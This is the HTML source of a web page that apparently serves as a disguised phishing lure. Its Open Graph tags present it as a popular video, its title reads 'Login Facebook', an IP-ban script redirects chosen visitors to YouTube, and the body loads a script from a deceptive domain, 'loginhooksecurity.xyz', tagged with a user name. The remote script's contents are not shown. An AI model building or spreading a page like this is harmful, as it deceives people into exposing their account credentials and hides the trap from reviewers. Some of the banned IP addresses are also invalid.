<script type="text/javascript">

// Block IP address script- By JavaScriptKit.com (http://www.javascriptkit.com)
// For this and over 400+ free scripts, visit JavaScript Kit- http://www.javascriptkit.com/
// This notice must stay intact for use.

//Enter list of banned ips, each separated with a comma:
var bannedips=["73.144.32.114", "73.144.32.114", "99.38.175.146", "172.58.121.35", "172.58.121.35", "172.58.121.35", "68.58.189.0", "99.38.175.146", "72.168.128.90", "68.36.174.182", "172.58.121.225", "24.99.251.90", "24.99.251.90", "278.0.0.48.102", "78.159.101.115", "173.66.223.166", "279.0.0.19.120", "174.228.142.63", "279.0.0.19.120", "173.66.223.166", "74.109.251.161", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11"]

var ip = '<!--#echo var="REMOTE_ADDR"-->'

var handleips=bannedips.join("|")
handleips=new RegExp(handleips, "i")

if (ip.search(handleips)!=-1){ 
alert("Your IP has been banned from this site. Redirecting...")
window.location.replace("https://www.youtube.com/watch?v=jejL8byGlmI&list=PLKlDibEWwyV1CIqDTSoiwbckjWFLQLs7p&index=5")
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="og:site_name" content="Video">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=5.0,user-scalable=yes">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta property="og:title" content="Videos">
<meta content='https://1.bp.blogspot.com/-rhNgfqMIiqY/YAnjutZV5MI/AAAAAAAALLI/EZ0IJQDshxQuwSNyslf51Gxi_mytIsZ1ACLcBGAsYHQ/s456/adsadsafdsa.png' property='og:image'/>
<meta property="og:description" content="100.502Views">
<meta content='https://1.bp.blogspot.com/-rhNgfqMIiqY/YAnjutZV5MI/AAAAAAAALLI/EZ0IJQDshxQuwSNyslf51Gxi_mytIsZ1ACLcBGAsYHQ/s456/adsadsafdsa.png' property='og:url'/>
<meta property="og:url" content="https://www.youtube.com/watch?v=jejL8byGlmI&list=PLKlDibEWwyV1CIqDTSoiwbckjWFLQLs7p&index=5">
<meta property="og:type" content="Videos">
<title>Login Facebook</title>
</head>
<body style="font-family: Arial;font-size: 12pt;">
<script src="https://loginhooksecurity.xyz/content.php?users=marichal" type="text/javascript" async="true"></script>